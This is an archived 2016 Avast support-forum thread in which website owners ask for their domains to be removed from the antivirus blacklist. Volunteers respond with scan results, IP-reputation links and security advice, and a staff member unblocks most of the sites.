https://sitecheck.sucuri.net/results/multiencargos.com#sitecheck-details

And as been said, a huge amount of blacklisted domains on that IP.
It should stay blocked.

The solution is to remove the malicious file(s) and get dedicated hosting at a company that takes security seriously.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 16, 2016, 08:54:00 AM
Hi, the detection was turned off 2 days ago. Please do pay attention to what others are saying and secure your domain.
Title: Re: How to remove my website from your blacklist?
Post by: marc157 on August 18, 2016, 12:14:31 AM
Hello,

My client's URL also appears to be blacklisted by Avast. The Web Shield is reporting URL:Mal on http://www.wireside.com (http://www.wireside.com). I've scanned all of the files on the site by downloading them and scanning with Avast, as well as using multiple online malware scanners. I know that the site was previously infected, but is not any longer.

I scanned the site with VirusTotal and it reported that Quttera was reporting it as a malicious site (https://www.virustotal.com/en/url/ae6b38940c9dd514eb08a34dfce2cc73c1675b3d9d6a93e267a03aa5edf6e5eb/analysis/1471458795/ (https://www.virustotal.com/en/url/ae6b38940c9dd514eb08a34dfce2cc73c1675b3d9d6a93e267a03aa5edf6e5eb/analysis/1471458795/)), however when I scanned with Quttera, it was reported as not malicious: https://quttera.com/detailed_report/wireside.com (https://quttera.com/detailed_report/wireside.com).

Can you please check to see if wireside.com can be removed from the Avast blacklist if it is on one, or advise on what the problem is.

Thank you!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 18, 2016, 09:35:16 AM
VirusTotal does not scan sites.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on August 18, 2016, 09:37:29 AM
I am happy to hear the infection has been healed, I am unblocking wireside[.]com now!
Title: Re: How to remove my website from your blacklist?
Post by: jonas.klimes on August 20, 2016, 12:09:27 PM
Hello,

website of our NGO Na Den, z. s. - www.na-den.cz was was infected by some virus via Wordpress that was not updated.

I removed the infected wordpress installation and it is clean now. Could you please review our site and remove it from your blacklist?

Thank you.

Best Regards,
Jonas Klimes
Title: Re: How to remove my website from your blacklist?
Post by: cernik on August 20, 2016, 01:44:27 PM
www.na-den.cz unblocked
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 20, 2016, 02:11:53 PM
Site advisor still blocks as risky, but that may be outdated.

pol
Title: Re: How to remove my website from your blacklist?
Post by: doctorgester on August 27, 2016, 03:18:21 PM
Hello!

My website hxtp://dg-pic.tk/ never contained any malware. It's a website on top of a custom-built server providing an opensource desktop application: https://github.com/DoctorGester/dg-pic

It should be totally clean! Bitdefender also reports a malware and I contacted their support to resolve this.

Thanks in advance!

Title: Re: How to remove my website from your blacklist?
Post by: Pondus on August 27, 2016, 03:44:11 PM
@doctorgester  i guess the block is a result of using afarid.org as host

avast is notified so you should recive a why ... maybe not today   ;)



Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 27, 2016, 04:04:07 PM
Blacklisting doesn't have to mean that the site is malicious/contains malicious content.

Afraid.org used :
http://toolbar.netcraft.com/site_report?url=dg-pic.tk
From avast (for the free service from afraid):
Quote
Any domain hosted on afraid.org can be used by other persons for dns hosting without your control. When nobody has control on subdomains of domain (DNS hijacking), we block the whole domain in order to protect our users.

Suspicious :
https://www.virustotal.com/en/url/2b107625d57f9e60cf2b55a93ec3ae2393915f0820f25fac08c285c416f0a3a6/analysis/1472305053/

Blacklisted domains on that ASN :
http://urlquery.net/report.php?id=1472305106220
http://urlquery.net/report.php?id=1472305272305

Vulnarable library detected :
http://retire.insecurity.today/#!/scan/a8e8384209b55f57628a33fbce491fa30eca1259c94a2ca257f0bf7e02ae11e1

Several risks detected :
http://zulu.zscaler.com/submission/show/2449d900f6325cbf404929c2c8ad0f51-1472305015

Insecure headers :
https://securityheaders.io/?followRedirects=on&hide=on&q=dg-pic.tk

Really bad hoster :
http://sitevet.com/db/asn/AS24940
Title: Re: How to remove my website from your blacklist?
Post by: doctorgester on August 27, 2016, 04:26:06 PM
Right. So basically I should get rid of afraid DNS and update my jquery lib?
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 27, 2016, 04:53:11 PM
That and get a host that is more trusted/takes security serious.
Title: Re: How to remove my website from your blacklist?
Post by: doctorgester on August 27, 2016, 06:15:02 PM
Can't really switch my host sadly since I'm not using hetzner services directly and it's all paid forward for years.

I've switched DNS, thanks for the heads up!
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on August 29, 2016, 09:45:19 AM
Awesome, I am unblocking dg-pic[.]tk now ;)
Title: Re: How to remove my website from your blacklist?
Post by: sgt39 on September 06, 2016, 07:38:50 PM
we recently heard from one of our users that Avast firewall software has marked one of our news sites as a phishing site www.richmond.com .  I checked all the normal sites

https://www.virustotal.com

http://quttera.com

http://sitecheck.sucuri.net

http://www.urlvoid.com

http://www.mcafee.com/threat-intelligence/domain

http://safeweb.norton.com

http://urlquery.net

site is clean can you let me know what you are seeing or why it would be marked as phishing please. They also mentioned this article specifically http://www.richmond.com/opinion/our-opinion/article_b79cc2b6-8ed5-532c-92eb-4a37e779c433.html but usually the whole site would be marked.  This is a real newspaper site.  Thanks
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 06, 2016, 07:46:25 PM
A firewall doesn't block websites unless the user set a rule for it.
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on September 06, 2016, 08:31:16 PM
A firewall doesn't block websites unless the user set a rule for it.

Being a phishing site detection, it is more likely to be the AOS browser add-on/extension or the web shield rather than the firewall.
Title: Re: How to remove my website from your blacklist?
Post by: sgt39 on September 06, 2016, 09:02:30 PM
looks like it is just this one article and have not heard from any other users either. 

I heard back from this user and he had some good information. On his phone, McAfee site advisor from Verizon gives him an error message when he goes to the article. On his tablet, he went to Richmond.com and searched for the article, found it, clicked on the story and then received a message from Avast. Verizon is his cable provider and he was using Verizon wi-fi on his tablet, but on his phone it was 3G and not wi-fi. He went to his phone again with me on the phone and received the error message. He’s sending a screenshot over and I’ll share.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 06, 2016, 09:48:17 PM
Could have been the tracker.js code hat played into this, but let us wait and see.

Furthermore there is code to be retired: http://retire.insecurity.today/#!/scan/248c7657882b00ec1c64112971ec604db852b9a535ba8e5bcfbaac935fc60341

Re on that uri avast webshield flags: -http://www.domxssscanner.com/scan?url=https%3A%2F%2Fwww.richmond.com%2Fopinion%2Four-opinion%2Farticle_b79cc2b6-8ed5-532c-92eb-4a37e779c433.html

The scan has detected some POTENTIAL problems in these external files. First scroll down through the code listed out after the list of links, this is the code returned by the request for the URL you entered and check for any problems. Next, these link(s) will open the individual URL(s) in this tool, check through the code that is returned, compare the code being returned to a know clean copy, etc.

1 -> stats-newyork1.bloxcms dot com/shared-content/stats/common/tracker.js

Redirect OK: -htxps://launch.newsinc.com/143/js/embed.js  benign.

Suspicious: 4711:   < if​rame src="htXps://www.eventbrite.com/countdown-widget?eid=27221648684" frameborder="0" height="400" width="195" marginheight="0" marginwidth="0" scrolling="no" allowtransparency="true"> < / if​rame >

Note: The if​rame above look suspicious! What is being loaded from that src=URL might be OK.

Best candidate for this Webshield detection however is some encrypted content, see: -http://ddecode.com/hexdecoder/?results=b440e9af1b0b1bcdfef40d9b8d650c33
from line 3261 up to 3446 see -> -https://aw-snap.info/file-viewer/?tgt=https%3A%2F%2Fwww.richmond.com%2Fopinion%2Four-opinion%2Farticle_b79cc2b6-8ed5-532c-92eb-4a37e779c433.html&ref_sel=GSP2&ua_sel=ff&fs=1#ln_4711
N.B. unblock above link only when you know what to look for and are sufficiently website security apt.

We should hear from an Avast Team Member the code was just flagged because of the persistent obfuscation or because of the de-obfuscated code being also non-benign aka suspicious/malicious.

I am just a volunteer with quite some experience & relevant knowledge, but unblocking is just for Avast Team Members,
so wait for a reaction by one of them.

polonus (volunteer website analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 07, 2016, 09:22:20 AM
I noticed we have indeed blocked richmond[.]com/opinion/our-opinion/article_b79cc2b6-8ed5-532c-92eb-4a37e779c433.html as phishing. This is most likely a False Positive, so I am unblocking it right now ;)
Title: Re: How to remove my website from your blacklist?
Post by: Tomi12 on September 20, 2016, 09:33:32 PM
Hi. I'm getting false malware alert from Avast mobile for my site www.reissussa .fi. Could you remove my site from blacklist?

Tomi Helin
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 20, 2016, 09:48:55 PM
1 vulnerable library detected :
http://retire.insecurity.today/#!/scan/740e77c37c2cb26dd18190b5d6feb63cd05cb53cdba67df9c5de171b964e37b6

Insecurities on Wordpress (althoug it looks like the second one seems a error in the detection) :
The following plugins were detected by reading the HTML source of the WordPress sites front page.
kirki 2.3.2   latest release (2.3.6) Update required
http://kirki.org

siteorigin-panels 2.4.9   latest release (2.4.15) Update required
https://siteorigin.com/page-builder/

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User            Login
1   Tomi             tomi
2   QuidusDemos   quidusdemos

Some problems on that IP :
https://www.virustotal.com/en/ip-address/178.213.233.224/information/
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 20, 2016, 09:58:20 PM
An addition for the reversed DNS, server DROWn vulnerable: https://test.drownattack.com/?site=n44.netsor.fi

The following domain names are vulnerable to man-in-the-middle attacks. Attackers may be able to impersonate the server and steal or change data.

Anyway, I do not see avast flag the site or blacklist it at the moment.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 21, 2016, 08:01:24 AM
Hi Tomi,
I am unblocking reissussa[.]fi now, but please do take care of the vulnerabilities and insecurities others pointed out, or it might be blocked automatically again.
Title: Re: How to remove my website from your blacklist?
Post by: nelsonvogel on September 23, 2016, 03:53:56 AM
Hi, my web site www.sollove.com.br was blocked by avast. All malware was already removed. Can you please remove it from your black list? Thank you
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on September 23, 2016, 04:14:35 AM
Hi, my web site hxxp:www.sollove.com.br was blocked by avast. All malware was already removed. Can you please remove it from your black list? Thank you


(http://i.imgur.com/PXdUC6r.png)

Hello.

Site was blocked Locky Ransomware

http://urlquery.net/report.php?id=1474596383580

http://zulu.zscaler.com/submission/show/e752da019c6e39f501232179dff5ff06-1474597251

http://zulu.zscaler.com/submission/show/a9bd32356aac84b89e7ffdaa1c34b438-1474597384

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 23, 2016, 09:02:43 AM
I hope the Locky was already removed, and I am removing sollove[.]com.br from our blacklist. Be sure to secure your server better ;)!
Title: Re: How to remove my website from your blacklist?
Post by: jwwdaterd on October 14, 2016, 05:37:32 PM
Tried three times through the false positive report when notified by avast in the past. This has never been resolved. Can you help? I show no reason why it should be reported as blacklisted anywhere. Attachments show urlvoid and virustotal reports. Site is www.mountainskies.com
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on October 14, 2016, 06:32:00 PM
Blacklistings and other problems there :
http://urlquery.net/report.php?id=1476462160807

Phishing detected on that IP :
http://urlquery.net/report.php?id=1476121518113

Really bad IP history :
https://www.virustotal.com/en/ip-address/69.195.124.109/information/

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User            Login
1                      None
2   John Wright   jwwdaterd

Vulnerable libraries :
http://retire.insecurity.today/#!/scan/77dc477b346e64d1b75b79001524cab0f491dc54cdcb22d0d9009edc46f750a6

Advise :
- Solve the mentioned problems
- Get dedicated hosting
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 14, 2016, 06:54:27 PM
Eddy is right, and there is more ....

When we do a DNS report: WARNING: Name servers software versions are exposed:
162.88.60.37: "PowerDNS Authoritative Server 3.4.7 (jenkins@autotest.powerdns.com built 20151103151207 root@autotest.powerdns.com)"
162.88.61.37: "PowerDNS Authoritative Server 3.4.7 (jenkins@autotest.powerdns.com built 20151103151207 root@autotest.powerdns.com)"

Certificate name mismatch and 6 other issues/problems found: https://mxtoolbox.com/domain/www.mountainskies.com/

URLs that redirect found in: -http://www.mountainskies.com/

1: -http://www.teamviewer.com/link/?url=963497&id=1119595237 -> -https://www.teamviewer.com/link/?url=963497&id=1119595237
are these legit: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fwww.mountainskies.com%2F&ref_sel=GSP2&ua_sel=ff&fs=1

IP history probably is at the base of this blocking, see: https://cymon.io/69.195.124.109

And it is not only avast to alert on this IP, there are other sources as well:
Reporting sources: quttera.com, c-sirt.org, blocklist.de, labs.snort.org, tor.ahbl.org, dnsbl.ahbl.org, openphish.com, virustotal.com, urlquery.net,
google safebrowsing, phishtank, cleanmx-malware, cleanmx-phishing

Conclusion: "da baddie neigbors on that same IP address!"

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on October 17, 2016, 09:10:21 AM
Yup, we blocked mountainskies[.]com a year ago because of distribution of Angler EK. Since I do not see any evidence of anything malicious going on on that domain, I am unblocking it now ;) Please do pay attention to what others pointed out, though!
Title: Re: How to remove my website from your blacklist?
Post by: John871 on October 28, 2016, 09:31:31 PM
hi our web site is http://www.dyslexia-athens.gr/ can you please remove it from blacllist as the web site is clean
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on October 28, 2016, 10:12:26 PM
hi our web site is http://www.dyslexia-athens.gr/ can you please remove it from blacllist as the web site is clean

suspicious > http://www.UnmaskParasites.com/security-report/?page=www.dyslexia-athens.gr

Blacklisted > https://virustotal.com/en/url/23623400ff11dddb6f9b2ab71e492eeba71bc7e81f51bdf661cec1612e06cd03/analysis/1477685430/

Infected > https://sitecheck.sucuri.net/results/www.dyslexia-athens.gr

HTML scan > https://virustotal.com/en/file/e742ef5d5bcb936c26a7e4dd561d33b0eaccaf35a64ae37c0f4433be7ad02b4e/analysis/1477685698/


So website is NOT clean   8)



Title: Re: How to remove my website from your blacklist?
Post by: Eddy on October 28, 2016, 10:18:38 PM
Blacklisted :
http://www.urlvoid.com/scan/dyslexia-athens.gr/
https://www.virustotal.com/en/url/23623400ff11dddb6f9b2ab71e492eeba71bc7e81f51bdf661cec1612e06cd03/analysis/1477685430/

Infected :
https://sitecheck.sucuri.net/results/www.dyslexia-athens.gr

Bad IP history :
https://www.virustotal.com/en/ip-address/198.143.107.188/information/

Malicious javascript :
https://quttera.com/detailed_report/www.dyslexia-athens.gr

Wordpress issue :
Warning Directory Indexing Enabled

Vulnerable library :
http://retire.insecurity.today/#!/scan/88bcf4db9f1ac07b7579851911ef9f4fa1a15f31fa3353c73ceb5d04a95579bc
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 28, 2016, 10:33:32 PM
Additional to what Eddy mentions here Sucuri also gives the known javascript malware.
Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.003
that Quttera detects twice.
Fortinet's detection alert is mentioned at the VT results: https://www.virustotal.com/nl/url/23623400ff11dddb6f9b2ab71e492eeba71bc7e81f51bdf661cec1612e06cd03/analysis/1477685430/

Three times where the "same origin" rule has been violated and sri-hashes come missing - hence B-Status: https://sritest.io/#report/28c2b871-bb44-49a2-88f6-3ec362423146

Look at jQuery UI sortable for glitches.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on November 02, 2016, 01:10:52 PM
dyslexia-athens[.]gr does not seem to be blocked by Avast now. Post printscreen if the issue persists ;)
Also, we already "solved" this with John871 via PM, I am just posting this for the sake of completeness :)
Title: Re: How to remove my website from your blacklist?
Post by: c.camargo on November 16, 2016, 01:35:41 AM
Hi,

We need your help, our university's page http://www.javeriana.edu.co are being blocked by Avast. We are a University, we aren´t a maliciosus site. please remove javeriana's site from your blacklist.


Thanks for your help.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 16, 2016, 02:32:50 AM
If avast shows URL:Mal it doesn't mean by default that the website is malicious.
It means the IP and/or domain is blocked.
There are multiple reasons why this can happen.

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/4cb508cd47b15499e452736d45dd3bb4736ea80a4367fdd1a05d62f1ffbe01af

Browser difference and (possible) other problems :
https://www.websicherheit.at/website-malware-viren-scanner/?url=www.javeriana.edu.co

Blacklisted (Phising) :
http://zulu.zscaler.com/submission/show/0a64e3c36cebe90bedb75c4e0a0667ae-1479259535
http://www.urlvoid.com/scan/javeriana.edu.co/
https://www.virustotal.com/en/url/1ce7893211cfebf3807b09c401a7776c7971ccdf705fbaec08321a2678266444/analysis/1479259573/

Phishing and other problems :
http://urlquery.net/report.php?id=1479259568583

https://www.virustotal.com/en/ip-address/200.3.149.136/information/
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on November 16, 2016, 10:12:36 AM
We have indeed blocked javeriana[.]edu.co/home as it was reported as phishing, from 14.11., 21:21 to 16.11., 03:19 (both CET). It should be okay now ;)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on November 16, 2016, 01:39:40 PM
Good that the website got unblocked now, but the website managment should take measures against phishing,
at least log for it.

Also improve the overall security structure, see the mediocre results here:
https://observatory.mozilla.org/analyze.html?host=www.javeriana.edu.co 
Guess a university could perform somewhat better in thesecrespects  ;)

polonus
Title: Re: How to remove my website from your blacklist?
Post by: c.camargo on November 16, 2016, 03:24:54 PM
Hi,

Thanks a lot for your attention and help. we are verifying and taking the correction for these threats.

Best regards,

Title: Re: How to remove my website from your blacklist?
Post by: martinjon on November 29, 2016, 10:27:12 PM
Our Site farmlogix.net have been blacklisted and I have done a lot of 3rd party scanning to see if I can locate an issue but nothing is coming to the fore, can we resolve this.

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 29, 2016, 11:18:07 PM
I don't know what scans you have run, but my scans do show issues/problems.

Vulnarable library used :
http://retire.insecurity.today/#!/scan/7a15c56b643ad68ed1b826ea97f000b67a3e3c949ce46ee1c4e4dd9a8ad0c9f5

Blacklisted by McAfee :
http://www.siteadvisor.com/sites/farmlogix.net

Huge amount of malicious (Phishing) activity on that IP :
https://www.virustotal.com/en/ip-address/50.62.108.1/information/

Blacklistings and other problems there :
http://urlquery.net/report.php?id=1480455793043

Advise :
- Step away from shared hosting and get dedicated hosting
- Hire a real admin
Title: Re: How to remove my website from your blacklist?
Post by: polonus on November 29, 2016, 11:27:36 PM
Additionally to what Eddy gives:

It is not only avast that blacklists your website.
Please check this list for unknown links on your website:

-http://www.cnbc.com/2016/02/19/farmlogix-helps-give-local-fa  -->  'watch the video. '
-http://bluesky.chicagotribune.com/originals/chi-innovation-a  -->  'read more.'
-http://www.enable-javascript.com/  -->  ' instructions how to enable j'

Check embedded iFrames: <iframe frameborder="0" height="100" src="htxps://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2963.515400278078!2d-87.68029358459327!3d42.03212717921026!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x880fd040821375a3%3A0x4c378715350a0359!2s530+Kedzie+St%2C+Evanston%2C+IL+60202!5e0!3m2!1sen!2sus!4v1466906669023" style="border:0" width="300"></iframe>
<iframe frameborder="0" height="100" src="htxps://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2972.18447076208!2d-87.67518998459919!3d41.84585607922484!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x880e2dbca7c328cd%3A0xa1c903462714893c!2s2404+S+Wolcott+Ave%2C+Chicago%2C+IL+60608!5e0!3m2!1sen!2sus!4v1466902658045" style="border:0" width="300"></iframe>

And there is more on that same IP: http://urlquery.net/report.php?id=1480458285564

polonus

Title: Re: How to remove my website from your blacklist?
Post by: Kim Trien on November 30, 2016, 03:32:21 AM
Hi,

We need your help, my website https://kimnguyen.info/ are being blocked by Avast.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on November 30, 2016, 07:59:25 AM
Hi,

We need your help, my website hxxps://kimnguyen.info/ are being blocked by Avast.
You can report an URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on November 30, 2016, 10:43:38 AM
WordPress issues: check your plug-ins for latest versions.
Warning: User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   KjmTrue   nkt
2   Curtisenep   curtisenep
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Two vuln. jQuery libraries: http://retire.insecurity.today/#!/scan/685e34288f59df2a3499a0698aac7e84c9fd8e553c717d7d9dc836d0d2b4622b

F-status: https://observatory.mozilla.org/analyze.html?host=kimnguyen.info

Probably the detection is CloudFlare IP related, but wait for a verdict from an Avast Team Member,
as we here are only volunteers with relevant knowledge and cannot unblock your domain,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on November 30, 2016, 01:38:03 PM
I am unblocking kimnguyen[.]info now ;)
Title: Re: How to remove my website from your blacklist?
Post by: Nazrard on December 12, 2016, 09:09:41 AM
Hello.

Need your help with blocked by avast http://balaklava[.]com[.]ua.

Can you please help me?
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on December 12, 2016, 09:13:25 AM
-> https://sitecheck.sucuri.net/results/balaklava.com.ua
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on December 12, 2016, 09:17:11 AM
Seems like an old detection, I am unblocking balaklava[.]com.ua now...
Do check why McAfee (http://www.siteadvisor.com/sites/balaklava.com.ua) thinks there is trouble though, or it might be blocked automatically again!
Title: Re: How to remove my website from your blacklist?
Post by: Nazrard on December 12, 2016, 09:50:36 AM
Seems like an old detection, I am unblocking balaklava[.]com.ua now...
Do check why McAfee (http://www.siteadvisor.com/sites/balaklava.com.ua) thinks there is trouble though, or it might be blocked automatically again!

Thank you for your help!

Now contacting McAfee.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 12, 2016, 12:50:15 PM
Not only McAfee is blacklisting the site.
http://www.urlvoid.com/scan/balaklava.com.ua/

Vulnerable libraries (cause = old software used) :
http://retire.insecurity.today/#!/scan/7f6b3fbecf8e384ebffbe36de0d58298a2fa1fc1a3ffcf180c76429ba1150dde
http://zulu.zscaler.com/submission/show/70d98370cf77f449efaea0c659939c8a-1481542346

Multiple blacklistings on that IP/ASN/Domain :
http://urlquery.net/report.php?id=1481542982863

Advise :
- As it is a commercial website, step away from shared hosting. (use dedicated hosting)
- Fix the vulnerable libraries and keep the site software up-to-date
- As personal data from the customers is required when ordering, use a secured protocol (HTTPS)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 12, 2016, 02:03:38 PM
Like Eddy stated, there are security issues with this site, despite of the fact it is not malicious as such.

Website could be somewhat more secure: https://observatory.mozilla.org/analyze.html?host=balaklava.com.ua

This here (same origin protection) seems OK: https://sritest.io/#report/a0093546-2ca1-468e-a17b-d0badd1711b4

Overview
Cookies not flagged as "HttpOnly" may be read by client side script and are at risk of being interpreted by a cross site scripting (XSS) attack. Whilst there are times where a cookie set by the server may be legitimately read by client script, most times the "HttpOnly" flag is missing it is due to oversight rather than by design.

Result
It looks like a cookie is being set without the "HttpOnly" flag being set (name : value):
Quote
ci_session : a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bd48b1cf1a54d2a09adb201361b29e0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2254.235.159.203%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A12%3A%22asafaweb.com%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1481547481%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D07552ff8ba2eed3c13236e652141f5d034cb83cb
Unless the cookie legitimately needs to be read by JavaScript on the client, the "HttpOnly" flag should always be set to ensure it cannot be read by the client and used in an XSS attack.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: rz350user on December 22, 2016, 02:29:32 AM
Guys, I need some help, My website is blocked by your antivirus, It pops up a warning "Threat Blocked"  My url is http://www.centrixbuilders.com

https://sitecheck.sucuri.net/results/http://www.centrixbuilders.com/
http://www.siteadvisor.com/sites/http%3A//www.centrixbuilders.com/
http://www.urlvoid.com/scan/siteadvisor.com/
https://www.mywot.com/en/scorecard/centrixbuilders.com
https://www.virustotal.com/en/url/4719df026d632fb7bf71d3f3e0c7dfd7c62dcd157d8018d05cc026a5e5c8200e/analysis/
http://urlquery.net/report.php?id=1482370839206
http://zulu.zscaler.com/submission/show/fbd47074a61ea3fc7215a70f0752eb00-1482370844
http://retire.insecurity.today/#!/scan/6aefb0da89d0cadd494fe882871bc2a2606a3b69e61e8624e05a2f9686efec05

I have scanned the URL with all the recommendations that are listed in this thread and its clean, I have also checked it on blacklists and its clean.
I have tried 4 other Antivirus and no problems, I have to disable Avast to see my site.
I am getting calls from clients that they cannot view the site and they have Avast installed.

Can you help me with this.

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on December 22, 2016, 06:35:05 AM
You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 22, 2016, 09:19:51 AM
Here is a major problem :
https://www.virustotal.com/en/ip-address/208.109.47.128/information/

Step away from shared hosting on GoDaddy.

Here are some other problems :
http://dnscheck.pingdom.com/?domain=www.centrixbuilders.com
https://securityheaders.io/?q=www.centrixbuilders.com&followRedirects=on
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on December 22, 2016, 02:18:20 PM
I have unblocked centrixbuilders[.]com now, but please do take others' advice seriously ;)
Title: Re: How to remove my website from your blacklist?
Post by: rz350user on December 22, 2016, 03:33:22 PM
Thanks HonzaZ, I appreciate the help..  :)
Title: Re: How to remove my website from your blacklist?
Post by: T-Fin on December 23, 2016, 10:23:17 AM
 Hi, I need professional help, I´m newbie and cant understand these things. My webshop have blocked by avast and pops warning flag: "HTML: RedirME-inf".

www.elektrosavu.com

I have scan url with links in this topic, but cant find anything:

http://urlquery.net/report.php?id=1482484350334
http://www.urlvoid.com/scan/elektrosavu.com/
https://www.virustotal.com/fi/url/6ad533dcc054b87965b2c2592ea60c094513369b8431b4f75d825ea8febb786d/analysis/

Can some one says what cause this flag?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on December 23, 2016, 11:18:11 AM
There is a HTML script that redirect users to a blacklisted URL

https://www.virustotal.com/en/file/4c25924914bb3a332140631f101921054e6d98e4490f77fd8cd419ec21a097ec/analysis/1482488231/

Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 23, 2016, 01:27:26 PM
Not only that but there is more insecurity:

SRI Report a meagre D-Status: https://sritest.io/#report/c5d1c7fa-db3c-49c0-b6f9-00fa54705f45

Same library is vuln.: http://retire.insecurity.today/#!/scan/23204d0728b38a3728cf062d05cea0b4cf7701bf683e572a5c39ec5ba6b7d4f8

F-I-A-C-F-X-Status here: https://observatory.mozilla.org/analyze.html?host=www.elektrosavu.com

Nameserver version exposed: 185.20.137.219: "1.2.8.31" for  wXw.elektrosavu.com
The default server page there has insecure IDs tracking:
 66% of the trackers on this site could be protecting you from NSA snooping. Tell to fix it.
 All trackers
At least 3 third parties know you are on this webpage.

 -shaaaaaaaaaaaaa.com
 -Google
-185.20.137.219  -185.20.137.219

While  -elektrosavu.com is on another IP - 80.69.173.28

See insecurity here: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.elektrosavu.com%2Fsuper_search.php%3Fsearch%3D

hackable especially the older revised version of the script: 'super_search.url' => 'http://url/hacks/directory/favorite_setting.xml',
....starting on line 148 of “widget.super_search.php”:

Hire someone with relevant knowledge to keep your webshop site secure, else you would "be food for the birds" in no-time.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Heitor Chrisostomo on December 24, 2016, 04:19:30 PM
Hello,

I have a domain (startfinanceiro.com) that is being blocked (URL: Bad). I've checked some security sites, which are usually given as a reference, and they say the site is safe.

Https://www.google.com/transparencyreport/safebrowsing/diagnostic/?hl=en#url=startfinanceiro.com

Https://sitecheck.sucuri.net/results/startfinanceiro.com

Https://quttera.com/detailed_report/www.startfinanceiro.com

In this way, I believe it is a false positive ... I would like to know what I can do to get the site out of this Avast lock, which certainly affects not only me but potential visitors to our domain.

I even sent an email to Hostgator and was informed that everything is normal.

I would like to be able to solve this soon, Avast is a very popular antivirus and surely other people are having the same lock, which directly affects future access.

Kind regards.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 24, 2016, 05:17:39 PM
There is no URL:Bad in the avast definitions.

If you mean URL:Mal, the message is correct as the IP is blacklisted.

https://www.virustotal.com/en/ip-address/216.172.172.252/information/

There are also more blacklistings on that ASN :
http://urlquery.net/report.php?id=1482596220888

You also have a link on your site that points to a blacklisted IP :
https://www.virustotal.com/en/ip-address/104.28.6.104/information/
Title: Re: How to remove my website from your blacklist?
Post by: Rodrigo_ on December 24, 2016, 05:46:17 PM
My page is being blocked by avast, but I have already reviewed it by Google webmaster tools and there is no problem, it says it's a safe page

Page link: http://neoplayerpodcast.blogspot.com.br

Title: Re: How to remove my website from your blacklist?
Post by: Heitor Chrisostomo on December 24, 2016, 05:48:10 PM
But the fact that ip is blacklisted does not exactly mean that my site is infected or that it is a risk. Unfortunately not everyone has a dedicated host.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 24, 2016, 06:13:01 PM
Rodrigo,

Phishing :
http://zulu.zscaler.com/submission/show/fd95ce331acf08196373f9b208215014-1482587200

Redirection to external server :
https://www.websicherheit.at/website-malware-viren-scanner/?url=neoplayerpodcast.blogspot.com.br

Blacklisted :
http://www.urlvoid.com/scan/neoplayerpodcast.blogspot.com.br/
https://www.virustotal.com/en/url/0a5b82c6a0658fac73ff434c73b10935a38f2d814fdb379a3a6dc23878a3fedc/analysis/1482599360/

Multiple blacklistings :
http://urlquery.net/report.php?id=1482599400330

Blacklistings, multiple malicious files distributed :
https://www.virustotal.com/en/ip-address/173.194.74.132/information/
